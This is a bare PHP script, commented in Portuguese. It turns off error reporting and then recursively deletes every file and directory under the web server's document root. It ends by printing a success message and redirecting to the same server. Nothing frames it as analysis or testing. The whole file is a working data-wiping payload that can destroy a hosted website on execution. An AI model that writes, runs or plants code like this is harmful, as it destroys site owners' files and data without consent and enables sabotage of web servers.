
error_reporting(0);
ini_set("display_errors", 0);

function deleteDirectory($dir) {
    if (!file_exists($dir)) {
        return true;
    }

    if (!is_dir($dir)) {
        return unlink($dir);
    }

    foreach (scandir($dir) as $item) {
        if ($item == '.' || $item == '..') {
            continue;
        }

        if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
            return false;
        }
    }

    return rmdir($dir);
}

// Chame a função para excluir a pasta
$directoryToDelete = $_SERVER['DOCUMENT_ROOT'];
if (deleteDirectory($directoryToDelete)) {
    echo 'Pasta excluída com sucesso.';
}

header("Location: http://".$_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"]);
